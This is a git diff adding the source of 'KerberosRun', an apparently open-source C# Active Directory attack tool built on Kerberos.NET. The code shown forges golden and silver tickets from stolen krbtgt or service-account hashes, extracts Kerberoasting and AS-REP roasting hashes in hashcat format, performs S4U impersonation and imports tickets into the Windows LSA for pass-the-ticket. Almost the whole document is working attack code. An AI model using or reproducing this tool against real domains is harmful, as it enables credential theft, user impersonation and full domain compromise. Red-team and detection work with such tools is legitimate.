+            cancellation.ThrowIfCancellationRequested();
+
+
+
+            KrbTgsRep tgsRep = null;
+            try
+            {
+                tgsRep = await transport.SendMessage<KrbTgsRep>(
+                rst.Realm,
+                encodedTgs,
+                cancellation
+                );
+            }
+            catch (KerberosProtocolException pex)
+            {
+                Console.WriteLine("[x] Kerberos Error: {0}\n", pex.Message);
+                Environment.Exit(0);
+            }
+
+
+            Console.WriteLine("[*] Receiving TGS-REP ...");
+            if (verbose) { PrintFunc.PrintRep(tgsRep, credKey); }
+
+
+
+
+
+
+
+
+
+
+            var returnFlag = TicketFlags.Anonymous;
+
+            try
+            {
+                //TGS-REP Enc-Part
+                //https://github.com/dotnet/Kerberos.NET/blob/develop/Kerberos.NET/Entities/Krb/KrbTgsReq.cs#L144
+                KrbEncTgsRepPart tgsDecryptedRepPart = tgsRep.EncPart.Decrypt<KrbEncTgsRepPart>(
+                    subSessionKey.AsKey(),
+                    KeyUsage.EncTgsRepPartSubSessionKey,
+                    (ReadOnlyMemory<byte> t) => KrbEncTgsRepPart.DecodeApplication(t));
+
+                if (verbose)
+                {
+                    Console.WriteLine("    * [Decrypted Enc-Part]:");
+                    PrintFunc.PrintRepEnc(tgsDecryptedRepPart, credKey);
+
+                    returnFlag = tgsDecryptedRepPart.Flags;
+
+
+                    if (!string.IsNullOrEmpty(tgsHash))
+                    {
+                        //=========================================
+                        //TGS Tiket Enc-Part
+                        //Service account Cred
+                        var kerbCred2 = new Utils.KerberosHashCreds(srvName, tgsHash, tgsEtype);
+
+                        //TGS-REQ Ticket Enc-Part
+                        KrbEncTicketPart ticketDecrypted = tgsRep.Ticket.EncryptedPart.Decrypt<KrbEncTicketPart>
+                            (kerbCred2.CreateKey(),
+                            KeyUsage.Ticket,
+                            (ReadOnlyMemory<byte> t) => KrbEncTicketPart.DecodeApplication(t));
+
+                        Console.WriteLine("    * [Decrypted Ticket Enc-Part]:");
+                        PrintFunc.PrintTicketEnc(ticketDecrypted);
+                        //=========================================
+
+                    }
+                }
+
+
+                if (outKirbi || outfile)
+                {
+                    var kirbiTGS = Kirbi.toKirbi(tgsRep, tgsDecryptedRepPart, ptt);
+                    if (outKirbi)
+                    {
+                        Console.WriteLine("[+] TGS Kirbi:");
+                        Console.WriteLine("    - {0}", Convert.ToBase64String(kirbiTGS));
+                    }
+                    if (outfile)
+                    {
+                        Utils.Utils.WriteBytesToFile(Utils.Utils.MakeTicketFileName(username, sname), kirbiTGS);
+                    }
+                }
+
+            }
+            catch (Exception e)
+            {
+                Console.WriteLine("[x] {0}", e.Message);
+            }
+
+
+
+
+            if (kerberoast)
+            {
+                //Kerberoasting
+                var encType = (int)Enum.Parse(typeof(EncryptionType), tgsRep.Ticket.EncryptedPart.EType.ToString());
+                var myCipher = (BitConverter.ToString(tgsRep.Ticket.EncryptedPart.Cipher.ToArray())).Replace("-", "");
+                var kroasthash = String.Format("$krb5tgs${0}$*{1}${2}${3}*${4}${5}", encType, username, domainName, spn, myCipher.Substring(0, 32), myCipher.Substring(32));
+                Console.WriteLine("[+] Kerberoasting Hash: {0}", kroasthash);
+
+            }
+
+
+            return returnFlag;
+
+
+        }
+
+    }
+}
diff --git a/KerberosRun/KerberosRun/BuildTicket.cs b/KerberosRun/KerberosRun/BuildTicket.cs
new file mode 100644
index 0000000..e0044ec
--- /dev/null
+++ b/KerberosRun/KerberosRun/BuildTicket.cs
@@ -0,0 +1,201 @@
+using System;
+using Kerberos.NET.Crypto;
+using Kerberos.NET.Entities;
+
+
+namespace KerberosRun
+{
+    class BuildTicket
+    {
+        //If the decryption routines detect a modification of the ticket, the KRB_AP_ERR_MODIFIED error message is returned.
+
+        public static KrbTicket BuildGolden(string krbtgtHash, EncryptionType etype, string username, string realm, int userid, string domainsid,
+            bool ptt = false, bool verbose = false)
+        {
+            var now = DateTime.UtcNow.AddTicks(-(DateTime.Now.Ticks % TimeSpan.TicksPerSecond));
+
+            Console.WriteLine("\n[*] Building Golden Ticket ...");
+
+            var krbtgtCred = new Utils.KerberosHashCreds("krbtgt", krbtgtHash, etype);
+
+            var authData = Pac.generatePac(username, domainsid, realm, krbtgtCred.CreateKey(), now, userid);
+
+            //Arbitrary session key
+            var sessionKey = KrbEncryptionKey.Generate(EncryptionType.RC4_HMAC_NT);
+
+            KrbEncTicketPart encTicket = new KrbEncTicketPart()
+            {
+                AuthTime = now,
+                StartTime = now,
+                //Ticket Expiration time (valid for 10 hours)
+                EndTime = now.AddHours(10),
+                RenewTill = now.AddDays(7),
+                CRealm = realm,
+                CName = new KrbPrincipalName()
+                {
+                    Type = PrincipalNameType.NT_PRINCIPAL,
+                    Name = new[] { username }
+                },
+                Flags = //TicketFlags.EncryptedPreAuthentication |
+                TicketFlags.PreAuthenticated |
+                TicketFlags.Initial |
+                TicketFlags.Renewable |
+                TicketFlags.Forwardable,
+                AuthorizationData = authData,
+                CAddr = null,
+                Key = sessionKey,
+                Transited = new KrbTransitedEncoding(),
+                
+            };
+
+            var encData = KrbEncryptedData.Encrypt(
+                encTicket.EncodeApplication(),
+                krbtgtCred.CreateKey(),
+                KeyUsage.Ticket);
+
+            //encData.KeyVersionNumber = 2;
+
+            var goldenTicket = new KrbTicket()
+            {
+                TicketNumber = 5,
+                Realm = realm,
+                SName = new KrbPrincipalName
+                    {
+                        Type = PrincipalNameType.NT_SRV_INST,
+                        Name = new[] { "krbtgt", realm }
+                    },
+                EncryptedPart = encData,
+            };
+
+
+            
+
+            if (verbose)
+            {
+
+                var de = goldenTicket.EncryptedPart.Decrypt
+                                (krbtgtCred.CreateKey(),
+                                KeyUsage.Ticket,
+                                b => KrbEncTicketPart.DecodeApplication(b));
+
+                Console.WriteLine("[*] Decrypting Golden Ticket ...");
+                PrintFunc.PrintTicketEnc(de);
+            }
+
+            Console.WriteLine("[*] Now you have a Golden Ticket!");
+
+
+
+            var kirbiTGT = Kirbi.toKirbi(goldenTicket, krbtgtHash, etype, ptt, verbose);
+            
+            Console.WriteLine("[+] Done! Now enjoy your ticket.");
+
+            return goldenTicket;
+
+
+        }
+
+
+
+
+
+        public static KrbTicket BuildSliver(string srvName, string srvHash, EncryptionType etype, string username, string realm, string service, string domainsid,
+            bool ptt = false, bool verbose = false)
+        {
+            var now = DateTime.UtcNow.AddTicks(-(DateTime.Now.Ticks % TimeSpan.TicksPerSecond));
+
+            Console.WriteLine("\n[*] Building Sliver Ticket ...");
+
+            var srvCred = new Utils.KerberosHashCreds(srvName, srvHash, etype);
+
+            var authData = Pac.generatePac(username, domainsid, realm, srvCred.CreateKey(), now);
+
+
+            //Arbitrary session key
+            var sessionKey = KrbEncryptionKey.Generate(EncryptionType.RC4_HMAC_NT);
+
+            KrbEncTicketPart encTicket = new KrbEncTicketPart()
+            {
+                AuthTime = now,
+                StartTime = now,
+                //Ticket Expiration time (valid for 10 hours)
+                EndTime = now.AddHours(10),
+                RenewTill = now.AddDays(7),
+                CRealm = realm,
+                CName = new KrbPrincipalName()
+                {
+                    Type = PrincipalNameType.NT_PRINCIPAL,
+                    Name = new[] { username }
+                },
+                Flags = //TicketFlags.EncryptedPreAuthentication |
+                TicketFlags.PreAuthenticated |
+                TicketFlags.Initial |
+                TicketFlags.Renewable |
+                TicketFlags.Forwardable,
+                AuthorizationData = authData,
+                CAddr = null,
+                Key = sessionKey,
+                Transited = new KrbTransitedEncoding(),
+
+            };
+
+            var encData = KrbEncryptedData.Encrypt(
+                encTicket.EncodeApplication(),
+                srvCred.CreateKey(),
+                KeyUsage.Ticket);
+
+            //encData.KeyVersionNumber = 2;
+
+            string srvHost = null;
+            if (srvName.Contains("$"))
+            {
+                srvHost = srvName.Replace("$", string.Empty) + "." + realm;
+            }
+            else
+            {
+                srvHost = srvName;
+            }
+            var sliverTicket = new KrbTicket()
+            {
+                TicketNumber = 5,
+                Realm = realm,
+                SName = new KrbPrincipalName
+                {
+                    Type = PrincipalNameType.NT_SRV_INST,
+                    Name = new[] { service, srvHost }
+                },
+                EncryptedPart = encData,
+            };
+
+
+
+
+            if (verbose)
+            {
+                var de = sliverTicket.EncryptedPart.Decrypt
+                                (srvCred.CreateKey(),
+                                KeyUsage.Ticket,
+                                b => KrbEncTicketPart.DecodeApplication(b));
+
+                Console.WriteLine("   * [Decrypted SliverTicket Ticket]:");
+                PrintFunc.PrintTicketEnc(de);
+            }
+
+
+
+            Console.WriteLine("[*] Now you have a Sliver Ticket!");
+
+            var kirbiTGT = Kirbi.toKirbi(sliverTicket, srvName, srvHash, etype, service, ptt, verbose);
+
+            
+            Console.WriteLine("[+] Done! Now enjoy your ticket.");
+
+            return sliverTicket;
+
+
+        }
+
+
+
+    }
+}
diff --git a/KerberosRun/KerberosRun/Commands.cs b/KerberosRun/KerberosRun/Commands.cs
new file mode 100644
index 0000000..4c6c8c8
--- /dev/null
+++ b/KerberosRun/KerberosRun/Commands.cs
@@ -0,0 +1,299 @@
+using Kerberos.NET.Crypto;
+using Kerberos.NET.Entities;
+using Kerberos.NET.Transport;
+using Microsoft.Extensions.Logging;
+using System;
+using System.Collections.Generic;
+using System.DirectoryServices.ActiveDirectory;
+using System.IO;
+using System.Linq;
+using System.Text;
+using System.Threading.Tasks;
+
+namespace KerberosRun
+{
+    class Commands
+    {
+        public static string kdc = null;
+        public static ILoggerFactory logger = null;
+        public static string username = null;
+        public static bool isUncontrainedDeleg = false;
+        public static bool outKirbi = true;
+        public static string domainname = null;
+        public static KrbAsRep asRep = null;
+        public static string hash = string.Empty;
+        public static EncryptionType etype = EncryptionType.RC4_HMAC_NT;
+        public static string tgtHash = string.Empty;
+        public static string tgsHash = string.Empty;
+        public static EncryptionType dEtype = EncryptionType.AES256_CTS_HMAC_SHA1_96;
+
+
+        public static void PTT(string ticket)
+        {
+            Console.WriteLine("[*] Importing Ticket...");
+            if (Utils.Utils.IsBase64String(ticket))
+            {
+                var kirbiBytes = Convert.FromBase64String(ticket);
+                PrintFunc.PrintKirbi(ticket);
+                LSA.ImportTicket(kirbiBytes, new LUID());
+                Environment.Exit(0);
+            }
+            else if (File.Exists(ticket))
+            {
+                byte[] kirbiBytes = File.ReadAllBytes(ticket);
+                PrintFunc.PrintKirbi(Convert.ToBase64String(kirbiBytes));
+                LSA.ImportTicket(kirbiBytes, new LUID());
+                Environment.Exit(0);
+            }
+            else
+            {
+                Console.WriteLine("\r\n[x]Ticket must either be a .kirbi file or a base64 encoded .kirbi\r\n");
+                Environment.Exit(0);
+            }
+        }
+
+        public static async Task ResolveCmd(Options options)
+        {
+            var transport = new TcpKerberosTransport(logger, kdc);
+            if (options.User != null)
+            {
+                username =  options.User.ToLower();
+            }
+            
+
+
+            if (options.Ticket != null)
+            {
+                PTT(options.Ticket);
+            }
+
+            if ((options.RC4 ?? options.AES128 ?? options.AES256) != null)
+            {
+                hash = options.RC4 ?? options.AES128 ?? options.AES256;
+                if (options.AES128 != null)
+                {
+                    etype = EncryptionType.AES128_CTS_HMAC_SHA1_96;
+                }
+                else if (options.AES256 != null)
+                {
+                    etype = EncryptionType.AES256_CTS_HMAC_SHA1_96;
+                }
+            }
+           
+            if ( options.Golden != options.Sliver)
+            {
+                if (options.Domain == null)
+                {
+                    Console.WriteLine("[x] Please provide the target domain name.");
+                    Environment.Exit(0);
+                }
+                //Build Ticket
+                if (options.Sliver)
+                {
+                    //var sliverTicket = 
+                    BuildTicket.BuildSliver(options.Host, hash, etype, username, options.Domain, options.Service, options.DomainSID,
+                   options.PTT, options.Verbose);
+                }
+                else
+                {
+                    //var goldenTicket = 
+                    BuildTicket.BuildGolden(hash, etype, username, options.Domain, options.UserID, options.DomainSID,
+                    options.PTT, options.Verbose);
+                }
+                Environment.Exit(0);
+            }
+
+
+
+
+            //Domain
+            if (options.Domain != null)
+            {
+                try
+                {
+                    var context = new DirectoryContext(DirectoryContextType.Domain, options.Domain);
+                    domainname = Domain.GetDomain(context).Name;
+                }
+                catch (Exception e) { Console.WriteLine(e.Message); Environment.Exit(0); }
+            }
+            else
+            {
+                try { domainname = Domain.GetCurrentDomain().Name; }
+                catch (Exception e) { Console.WriteLine("[*] {0}", e.Message); Environment.Exit(0); }
+            }
+
+
+
+            if (options.DecryptTGT != null || options.DecryptTGS != null)
+            {
+                if (options.DecryptEtype == null)
+                {
+                    Console.WriteLine("[x] Please provide the encrytion type of the Hash (rc4/aes128/aes256)");
+                    Console.WriteLine();
+                    Environment.Exit(0);
+                }
+                switch (options.DecryptEtype.Trim().ToLower())
+                {
+                    case "rc4":
+                        dEtype = EncryptionType.RC4_HMAC_NT;
+                        break;
+                    case "aes128":
+                        dEtype = EncryptionType.AES128_CTS_HMAC_SHA1_96;
+                        break;
+                    default:
+                        dEtype = EncryptionType.AES256_CTS_HMAC_SHA1_96;
+                        break;
+                }
+                if (options.DecryptTGT != null)
+                {
+                    tgtHash = options.DecryptTGT;
+                }
+                else if (options.DecryptTGS != null)
+                {
+                    if (string.IsNullOrEmpty(options.SrvName))
+                    {
+                        Console.WriteLine("[x] Please provide the service account name for decrypting TGS.");
+                        Environment.Exit(0);
+                    }
+                    tgsHash = options.DecryptTGS;
+                }
+            }
+
+
+            if (!string.IsNullOrEmpty(username))
+            {
+                ////////////////////////////////////////////////////////////
+                //ASREPRoasting
+                if (options.Asreproast)
+                {
+                    bool asreproast = true;
+                    if (options.Format.ToLower() == "john" || options.Format.ToLower() == "hashcat")
+                    {
+                        await Ask.askTGT(kdc, logger, transport, username, "whatever", domainname,
+                            outKirbi, options.Verbose, options.Format.ToLower(), asreproast, options.PTT, hash, etype, options.Outfile,
+                                tgtHash, dEtype);
+                        Console.WriteLine("[+] Done! Now enjoy your hash.");
+                    }
+                    else
+                    {
+                        Console.WriteLine("[x] Unknown hash format, Please use hashcat or john");
+                    }
+                }
+                else
+                {
+                    if (options.Pass == null && options.RC4 == null && options.AES128 == null && options.AES256 == null)
+                    {
+                        Console.WriteLine("[x] Please provide a valid password/hash");
+                        Environment.Exit(1);
+                    }
+                    else
+                    {
+                        ////////////////////////////////////////////////////////////
+                        //Ask TGT
+                        if (options.AskTGT)
+                        {
+                            await Ask.askTGT(kdc, logger, transport, username, options.Pass, domainname,
+                                outKirbi, options.Verbose, options.Format.ToLower(), false, options.PTT, hash, etype, options.Outfile,
+                                tgtHash, dEtype);
+                            
+                        }
+                        ////////////////////////////////////////////////////////////
+                        //Ask TGS
+                        else if (options.AskTGS)
+                        {
+                            if (options.Spn != null)
+                            {
+                                asRep = await Ask.askTGT(kdc, logger, transport, username, options.Pass, domainname,
+                                outKirbi, options.Verbose, options.Format.ToLower(), false, options.PTT, hash, etype, options.Outfile,
+                                tgtHash, dEtype);
+                                await Ask.askTGS(kdc, logger, transport, asRep, username, options.Pass, domainname,
+                                    options.Spn, isUncontrainedDeleg, outKirbi, options.Verbose, false, options.PTT, hash, etype,
+                                    options.Outfile, options.SrvName, tgsHash, dEtype);
+                            }
+                            else { Console.WriteLine("[x] Please provide an SPN for the service request."); }
+                        }
+                        ////////////////////////////////////////////////////////////
+                        //Kerberoasting
+                        else if (options.Kerberoast)
+                        {
+                            bool kerberoast = true;
+                            if (options.Spn != null)
+                            {
+                                asRep = await Ask.askTGT(kdc, logger, transport, username, options.Pass, domainname,
+                                outKirbi, options.Verbose, options.Format.ToLower(), false, options.PTT, hash, etype, options.Outfile,
+                                tgtHash, dEtype);
+                                await Ask.askTGS(kdc, logger, transport, asRep, username, options.Pass, domainname,
+                                    options.Spn, isUncontrainedDeleg, outKirbi, options.Verbose, kerberoast, options.PTT, hash, etype,
+                                    options.Outfile, options.SrvName, tgsHash, dEtype);
+                                Console.WriteLine("[+] Done! Now enjoy your hash.");
+                            }
+                            else { Console.WriteLine("[x] Please provide an SPN for Kerberoasting"); }
+                        }
+
+
+                        ////////////////////////////////////////////////////////////
+                        //S4U
+                        else if (options.S4U)
+                        {
+                            if (options.Impersonate != null && options.Spn != null)
+                            {
+                                asRep = await Ask.askTGT(kdc, logger, transport, username, options.Pass, domainname,
+                                    outKirbi, options.Verbose, options.Format, options.Asreproast, options.PTT, hash, etype, options.Outfile,
+                                tgtHash, dEtype);
+
+                                var s4u2self = await S4U.S4U2Self(kdc, logger, transport, asRep, username, options.Pass, domainname,
+                                    options.Impersonate, outKirbi, options.Verbose, options.PTT, hash, etype);
+
+                                await S4U.S4U2Proxy(kdc, logger, transport, asRep, s4u2self, username, options.Pass, domainname,
+                                    options.Impersonate, options.Spn, outKirbi, options.Verbose, options.PTT, hash, etype);
+
+                                Console.WriteLine("[+] Done! Now enjoy your ticket for {0}.", options.Spn);
+                            }
+                            else
+                            {
+                                Console.WriteLine("[x] Please provide an SPN and a username to impersonate");
+                            }
+                        }
+
+
+
+                        ////////////////////////////////////////////////////////////
+                        //S4U2Self
+                        else if (options.S4U2Self)
+                        {
+                            if (options.Impersonate != null)
+                            {
+                                string impersonate = options.Impersonate + "@" + domainname;
+                                asRep = await Ask.askTGT(kdc, logger, transport, username, options.Pass, domainname,
+                                    outKirbi, options.Verbose, options.Format, options.Asreproast, options.PTT, hash, etype, options.Outfile,
+                                tgtHash, dEtype);
+
+                                await S4U.S4U2Self(kdc, logger, transport, asRep, username, options.Pass, domainname,
+                                    impersonate, outKirbi, options.Verbose, options.PTT, hash, etype);
+
+                                Console.WriteLine("[+] Done! Now enjoy your ticket.");
+                            }
+                            else
+                            {
+                                Console.WriteLine("[x] Please provide a username to impersonate");
+                            }
+                        }
+                    }
+                }
+            }
+
+
+            //var flags = await Ask.askTGS(kdc, logger, transport, asRep, username, password, domainName, spn, isUncontrainedDeleg, outKirbi);
+            ////IF the target service has Unconstrained Delegation
+            //if (flags.HasFlag(TicketFlags.OkAsDelegate))
+            //{
+            //    Console.WriteLine("\n[*] Target Server is Trusted For Delegation, asking Forwarded TGT...");
+            //    await Ask.askTGS(kdc, logger, transport, asRep, username, password, domainName, spn, isUncontrainedDeleg, outKirbi);
+            //}
+        }
+
+
+
+
+    }
+}
diff --git a/KerberosRun/KerberosRun/FodyWeavers.xml b/KerberosRun/KerberosRun/FodyWeavers.xml
new file mode 100644
index 0000000..f1dea8f
--- /dev/null
+++ b/KerberosRun/KerberosRun/FodyWeavers.xml
@@ -0,0 +1,3 @@
+<Weavers xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="FodyWeavers.xsd">
+  <Costura />
+</Weavers>
\ No newline at end of file
diff --git a/KerberosRun/KerberosRun/FodyWeavers.xsd b/KerberosRun/KerberosRun/FodyWeavers.xsd
new file mode 100644
index 0000000..8ac6e92
--- /dev/null
+++ b/KerberosRun/KerberosRun/FodyWeavers.xsd
@@ -0,0 +1,111 @@
+<?xml version="1.0" encoding="utf-8"?>
+<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema">
+  <!-- This file was generated by Fody. Manual changes to this file will be lost when your project is rebuilt. -->
+  <xs:element name="Weavers">
+    <xs:complexType>
+      <xs:all>
+        <xs:element name="Costura" minOccurs="0" maxOccurs="1">
+          <xs:complexType>
+            <xs:all>
+              <xs:element minOccurs="0" maxOccurs="1" name="ExcludeAssemblies" type="xs:string">
+                <xs:annotation>
+                  <xs:documentation>A list of assembly names to exclude from the default action of "embed all Copy Local references", delimited with line breaks</xs:documentation>
+                </xs:annotation>
+              </xs:element>
+              <xs:element minOccurs="0" maxOccurs="1" name="IncludeAssemblies" type="xs:string">
+                <xs:annotation>
+                  <xs:documentation>A list of assembly names to include from the default action of "embed all Copy Local references", delimited with line breaks.</xs:documentation>
+                </xs:annotation>
+              </xs:element>
+              <xs:element minOccurs="0" maxOccurs="1" name="Unmanaged32Assemblies" type="xs:string">
+                <xs:annotation>
+                  <xs:documentation>A list of unmanaged 32 bit assembly names to include, delimited with line breaks.</xs:documentation>
+                </xs:annotation>
+              </xs:element>
+              <xs:element minOccurs="0" maxOccurs="1" name="Unmanaged64Assemblies" type="xs:string">
+                <xs:annotation>
+                  <xs:documentation>A list of unmanaged 64 bit assembly names to include, delimited with line breaks.</xs:documentation>
+                </xs:annotation>
+              </xs:element>
+              <xs:element minOccurs="0" maxOccurs="1" name="PreloadOrder" type="xs:string">
+                <xs:annotation>
+                  <xs:documentation>The order of preloaded assemblies, delimited with line breaks.</xs:documentation>
+                </xs:annotation>
+              </xs:element>
+            </xs:all>
+            <xs:attribute name="CreateTemporaryAssemblies" type="xs:boolean">
+              <xs:annotation>
+                <xs:documentation>This will copy embedded files to disk before loading them into memory. This is helpful for some scenarios that expected an assembly to be loaded from a physical file.</xs:documentation>
+              </xs:annotation>
+            </xs:attribute>
+            <xs:attribute name="IncludeDebugSymbols" type="xs:boolean">
+              <xs:annotation>
+                <xs:documentation>Controls if .pdbs for reference assemblies are also embedded.</xs:documentation>
+              </xs:annotation>
+            </xs:attribute>
+            <xs:attribute name="DisableCompression" type="xs:boolean">
+              <xs:annotation>
+                <xs:documentation>Embedded assemblies are compressed by default, and uncompressed when they are loaded. You can turn compression off with this option.</xs:documentation>
+              </xs:annotation>
+            </xs:attribute>
+            <xs:attribute name="DisableCleanup" type="xs:boolean">
+              <xs:annotation>
+                <xs:documentation>As part of Costura, embedded assemblies are no longer included as part of the build. This cleanup can be turned off.</xs:documentation>
+              </xs:annotation>
+            </xs:attribute>
+            <xs:attribute name="LoadAtModuleInit" type="xs:boolean">
+              <xs:annotation>
+                <xs:documentation>Costura by default will load as part of the module initialization. This flag disables that behavior. Make sure you call CosturaUtility.Initialize() somewhere in your code.</xs:documentation>
+              </xs:annotation>
+            </xs:attribute>
+            <xs:attribute name="IgnoreSatelliteAssemblies" type="xs:boolean">
+              <xs:annotation>
+                <xs:documentation>Costura will by default use assemblies with a name like 'resources.dll' as a satellite resource and prepend the output path. This flag disables that behavior.</xs:documentation>
+              </xs:annotation>
+            </xs:attribute>
+            <xs:attribute name="ExcludeAssemblies" type="xs:string">
+              <xs:annotation>
+                <xs:documentation>A list of assembly names to exclude from the default action of "embed all Copy Local references", delimited with |</xs:documentation>
+              </xs:annotation>
+            </xs:attribute>
+            <xs:attribute name="IncludeAssemblies" type="xs:string">
+              <xs:annotation>
+                <xs:documentation>A list of assembly names to include from the default action of "embed all Copy Local references", delimited with |.</xs:documentation>
+              </xs:annotation>
+            </xs:attribute>
+            <xs:attribute name="Unmanaged32Assemblies" type="xs:string">
+              <xs:annotation>
+                <xs:documentation>A list of unmanaged 32 bit assembly names to include, delimited with |.</xs:documentation>
+              </xs:annotation>
+            </xs:attribute>
+            <xs:attribute name="Unmanaged64Assemblies" type="xs:string">
+              <xs:annotation>
+                <xs:documentation>A list of unmanaged 64 bit assembly names to include, delimited with |.</xs:documentation>
+              </xs:annotation>
+            </xs:attribute>
+            <xs:attribute name="PreloadOrder" type="xs:string">
+              <xs:annotation>
+                <xs:documentation>The order of preloaded assemblies, delimited with |.</xs:documentation>
+              </xs:annotation>
+            </xs:attribute>
+          </xs:complexType>
+        </xs:element>
+      </xs:all>
+      <xs:attribute name="VerifyAssembly" type="xs:boolean">
+        <xs:annotation>
+          <xs:documentation>'true' to run assembly verification (PEVerify) on the target assembly after all weavers have been executed.</xs:documentation>
+        </xs:annotation>
+      </xs:attribute>
+      <xs:attribute name="VerifyIgnoreCodes" type="xs:string">
+        <xs:annotation>
+          <xs:documentation>A comma-separated list of error codes that can be safely ignored in assembly verification.</xs:documentation>
+        </xs:annotation>
+      </xs:attribute>
+      <xs:attribute name="GenerateXsd" type="xs:boolean">
+        <xs:annotation>
+          <xs:documentation>'false' to turn off automatic generation of the XML Schema file.</xs:documentation>
+        </xs:annotation>
+      </xs:attribute>
+    </xs:complexType>
+  </xs:element>
+</xs:schema>
\ No newline at end of file
diff --git a/KerberosRun/KerberosRun/KerberosRun.csproj b/KerberosRun/KerberosRun/KerberosRun.csproj
new file mode 100644
index 0000000..82cfc1a
--- /dev/null
+++ b/KerberosRun/KerberosRun/KerberosRun.csproj
@@ -0,0 +1,103 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <Import Project="..\packages\Costura.Fody.4.0.0\build\Costura.Fody.props" Condition="Exists('..\packages\Costura.Fody.4.0.0\build\Costura.Fody.props')" />
+  <PropertyGroup>
+    <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
+    <Platform Condition=" '$(Platform)' == '' ">anycpu</Platform>
+    <ProjectGuid>{00A1C81F-FAE9-4F80-9F7B-88C16C41DB2A}</ProjectGuid>
+    <OutputType>Exe</OutputType>
+    <RootNamespace>KerberosRun</RootNamespace>
+    <AssemblyName>KerberosRun</AssemblyName>
+    <TargetFrameworkVersion>v4.7.2</TargetFrameworkVersion>
+    <NuGetPackageImportStamp>
+    </NuGetPackageImportStamp>
+  </PropertyGroup>
+  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|anycpu' ">
+    <DebugSymbols>true</DebugSymbols>
+    <DebugType>full</DebugType>
+    <Optimize>false</Optimize>
+    <OutputPath>bin\Debug</OutputPath>
+    <DefineConstants>DEBUG;</DefineConstants>
+    <ErrorReport>prompt</ErrorReport>
+    <WarningLevel>4</WarningLevel>
+    <ExternalConsole>true</ExternalConsole>
+  </PropertyGroup>
+  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|anycpu' ">
+    <Optimize>true</Optimize>
+    <OutputPath>bin\Release</OutputPath>
+    <ErrorReport>prompt</ErrorReport>
+    <WarningLevel>4</WarningLevel>
+    <ExternalConsole>true</ExternalConsole>
+  </PropertyGroup>
+  <ItemGroup>
+    <Reference Include="CommandLine, Version=1.9.71.2, Culture=neutral, PublicKeyToken=de6f01bd326f8c32, processorArchitecture=MSIL">
+      <HintPath>..\packages\CommandLineParser.1.9.71\lib\net45\CommandLine.dll</HintPath>
+    </Reference>
+    <Reference Include="Costura, Version=4.0.0.0, Culture=neutral, PublicKeyToken=9919ef960d84173d, processorArchitecture=MSIL">
+      <HintPath>..\packages\Costura.Fody.4.0.0\lib\net40\Costura.dll</HintPath>
+    </Reference>
+    <Reference Include="Kerberos.NET, Version=4.0.0.0, Culture=neutral, PublicKeyToken=10b231fbfc8c4b4d, processorArchitecture=MSIL">
+      <HintPath>..\packages\Kerberos.NET.4.0.0-g\lib\netstandard2.0\Kerberos.NET.dll</HintPath>
+    </Reference>
+    <Reference Include="System" />
+    <Reference Include="Microsoft.Extensions.Logging.Abstractions">
+      <HintPath>..\packages\Microsoft.Extensions.Logging.Abstractions.3.1.2\lib\netstandard2.0\Microsoft.Extensions.Logging.Abstractions.dll</HintPath>
+    </Reference>
+    <Reference Include="System.Buffers">
+      <HintPath>..\packages\System.Buffers.4.5.0\lib\netstandard2.0\System.Buffers.dll</HintPath>
+    </Reference>
+    <Reference Include="mscorlib" />
+    <Reference Include="System.DirectoryServices" />
+    <Reference Include="System.Numerics.Vectors">
+      <HintPath>..\packages\System.Numerics.Vectors.4.4.0\lib\net46\System.Numerics.Vectors.dll</HintPath>
+    </Reference>
+    <Reference Include="System.Numerics" />
+    <Reference Include="System.Runtime.CompilerServices.Unsafe">
+      <HintPath>..\packages\System.Runtime.CompilerServices.Unsafe.4.5.2\lib\netstandard2.0\System.Runtime.CompilerServices.Unsafe.dll</HintPath>
+    </Reference>
+    <Reference Include="System.Memory">
+      <HintPath>..\packages\System.Memory.4.5.3\lib\netstandard2.0\System.Memory.dll</HintPath>
+    </Reference>
+    <Reference Include="System.Security.Cryptography.Pkcs">
+      <HintPath>..\packages\System.Security.Cryptography.Pkcs.4.7.0\lib\net461\System.Security.Cryptography.Pkcs.dll</HintPath>
+    </Reference>
+    <Reference Include="System.Security" />
+    <Reference Include="System.Threading.Tasks.Extensions">
+      <HintPath>..\packages\System.Threading.Tasks.Extensions.4.5.2\lib\netstandard2.0\System.Threading.Tasks.Extensions.dll</HintPath>
+    </Reference>
+    <Reference Include="System.IO.Pipelines">
+      <HintPath>..\packages\System.IO.Pipelines.4.7.0\lib\netstandard2.0\System.IO.Pipelines.dll</HintPath>
+    </Reference>
+  </ItemGroup>
+  <ItemGroup>
+    <Compile Include="BuildTicket.cs" />
+    <Compile Include="Commands.cs" />
+    <Compile Include="Options.cs" />
+    <Compile Include="Pac.cs" />
+    <Compile Include="Utils\Interop.cs" />
+    <Compile Include="Utils\KerberosHashCreds.cs" />
+    <Compile Include="Utils\LSA.cs" />
+    <Compile Include="Utils\LUID.cs" />
+    <Compile Include="Program.cs" />
+    <Compile Include="Properties\AssemblyInfo.cs" />
+    <Compile Include="Ask.cs" />
+    <Compile Include="KrbConstants.cs" />
+    <Compile Include="PrintFunc.cs" />
+    <Compile Include="S4U.cs" />
+    <Compile Include="Kirbi.cs" />
+    <Compile Include="Utils\Utils.cs" />
+  </ItemGroup>
+  <ItemGroup>
+    <None Include="app.config" />
+    <None Include="packages.config" />
+  </ItemGroup>
+  <Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
+  <Import Project="..\packages\Fody.5.0.6\build\Fody.targets" Condition="Exists('..\packages\Fody.5.0.6\build\Fody.targets')" />
+  <Target Name="EnsureNuGetPackageBuildImports" BeforeTargets="PrepareForBuild">
+    <PropertyGroup>
+      <ErrorText>This project references NuGet package(s) that are missing on this computer. Use NuGet Package Restore to download them.  For more information, see http://go.microsoft.com/fwlink/?LinkID=322105. The missing file is {0}.</ErrorText>
+    </PropertyGroup>
+    <Error Condition="!Exists('..\packages\Fody.5.0.6\build\Fody.targets')" Text="$([System.String]::Format('$(ErrorText)', '..\packages\Fody.5.0.6\build\Fody.targets'))" />
+    <Error Condition="!Exists('..\packages\Costura.Fody.4.0.0\build\Costura.Fody.props')" Text="$([System.String]::Format('$(ErrorText)', '..\packages\Costura.Fody.4.0.0\build\Costura.Fody.props'))" />
+  </Target>
